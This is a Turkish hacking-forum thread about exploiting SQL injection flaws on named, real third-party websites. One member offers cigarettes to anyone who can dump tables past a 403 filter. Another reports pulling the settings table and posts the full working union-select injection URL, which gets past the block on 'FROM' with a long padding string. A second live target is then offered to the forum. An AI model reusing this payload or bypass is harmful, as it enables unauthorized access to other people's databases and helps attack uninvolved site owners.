tabloları çekemiyorum ! çekebilene marlboro benden

sql açığı olan site buldum database adını gösteriyor ama tabloları okumaya geldimi forbidden hatası veriyor çekebilen varsa bir paket marlboro benden bakın oruçluyum ama...

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
sql açığı olan site buldum database adını gösteriyor ama tabloları okumaya geldimi forbidden hatası veriyor
çekebilen varsa bir paket marlboro benden bakın oruçluyum ama teklife bakın cuğara.

ekvatoremlaktemizlik.com/emlak.php?id=1

Ik6Kpjvov9i3CfiXdLDbw911r1PNb0oVsGsmW549ZkUMuldshY1hB-M3HBqc1mWgvX70p5JNpGz0BTC61hRjSQ%3D%3D

47 de okunuyor nasıl bekliyorum bi bilsen

Olm bırakın la tr siteleri emlakcıyla ne derdin var kardesım. Dorkları yabancı hedeflere yonelık geliştirin lütfen. Türk serverleri eğitim parkurumuz değil ben sevmiyorum tr sw

al kardeşim ayarlar tablosunu çektim hangi tablo lazımsa haber ver. Siteyi basmayın sahibine haber verin sql'i kapatsın bari hack bir işe yarasın :D

Ekli dosyalar

• adbes.txt
    1.9 KB · Görüntüleme: 8
Moderatörün son düzenlenenleri:
dostum ben dorkları geliştiriyorum kendime göre vs benim derdim basmak değil derdim sunucuya sızma bypass etme başka isteğim yok o yüzden manuel sql yapmaya çalıştım olmadı sağolsun @Adbes reis çekmiş helal olsun benden bi marlboro kazandınız efenim :D
birde çektiğin komutu yazarsan bende bilgilensem iyi olurdu..
tuketicimerkezi.org/basin.php?id=22 buda tuketici hakları merkezi sql injeciton açığı değerlendiren değerlendirsin ben basmıyorum kendimi geliştirmeye çalışıyorum sadece

dostum ben dorkları geliştiriyorum kendime göre vs benim derdim basmak değil derdim sunucuya sızma bypass etme başka isteğim yok o yüzden manuel sql yapmaya çalıştım olmadı sağolsun @Adbes reis çekmiş helal olsun benden bi marlboro kazandınız efenim :D
birde çektiğin komutu yazarsan bende bilgilensem iyi olurdu..
tuketicimerkezi.org/basin.php?id=22 buda tuketici hakları merkezi sql injeciton açığı değerlendiren değerlendirsin ben basmıyorum kendimi geliştirmeye çalışıyorum sadece
Şöyle kardeşim orada from yazıyorsun 403 veriyor sadece attığım dosyada gördüğün gibi hiç bir waf yapmadım sadece baktım from u engellemiş bellek taşırma ile bu güvenliği aştım bellek taşırma ne dersen o txt dosyasında gördüğün A harfleri :) inşallah istediğin seviyeye ulaşırsın kafana takılan soruları sorarsın pm ile

Allah senden razı olsun keşke herkes senin gibi eğitici olsa .
bende kodlara baktım A tuşuna bi yarım saat basılı tuttun galiba reyiz o ne öyle neyseki 1 bilgi 1 bilgidir birşey daha öğrenmiş oldum tekrardan çok teşekkür ettim

http://ekvatoremlaktemizlik.com/emlak.php
?id=-1' union select 1,hizmetler,3,4,5,6,7,8,9,10,11,12,13,14,15 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA FROM ayarlar--+

bende çoğaltmıştım ama olmamıştı ondan senden yine yardım istedim hatta kodları buraya yapıştırcaktım da cloudflare engeliyordu izin vermiyordu sen nasıl yazdınki

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
131,900Konular
3,272,399Mesajlar
316,498Kullanıcılar
tvxdevSon Üye
Üst Alt